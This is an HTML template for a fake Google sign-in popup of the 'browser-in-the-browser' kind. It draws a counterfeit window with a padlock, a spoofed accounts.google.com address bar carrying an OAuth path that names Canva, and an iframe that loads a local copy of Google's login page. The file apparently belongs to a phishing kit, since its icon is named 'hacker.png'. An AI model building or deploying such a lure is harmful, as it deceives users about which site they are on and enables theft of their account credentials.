<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" href="style.css">
	  <title>Sign in – Google accounts</title>
<link rel="icon" type="image/x-icon" href="../images/hacker.png">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>
<body>
<div id="window">
<!-- Title bar start -->
<div id="title-bar-width">
	<div id="title-bar">
		<div style="margin-top:5px;">
			<img src="./google.png" width="15px" height="15px" id="logo">
			<span id="logo-description">Sign in – Google accounts</span>
		</div>

		<div>
			<span id="minimize">&#8212;</span>
			<span id="square">□</span>
			<span id="exit">✕</span>
		</div>
	</div>
	<div id="url-bar">
		<img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">
		<span id="domain-name">https://accounts.google.com</span>
		<span id="domain-path">/o/oauth2/v2/auth/identifier?state=8462279e-dac8-4ce1-86c9-11ed0ede41be&access_type=offline&prompt=consent&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email%20https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.profile&response_type=code&client_id=779010036194-lf6spugv22vvj41pqjdj4d8k2tq7o5fd.apps.googleusercontent.com&redirect_uri=https%3A%2F%2Fwww.canva.com%2Foauth%2Fauthorized%2Fgoogle&flowName=GeneralOAuthFlow</span>
	</div>
</div>
<!-- Content start -->
<iframe id="content" src="./origPage/google.html" frameBorder="0"></iframe>
</div>
</body>
<script src="script.js"></script>
</html>

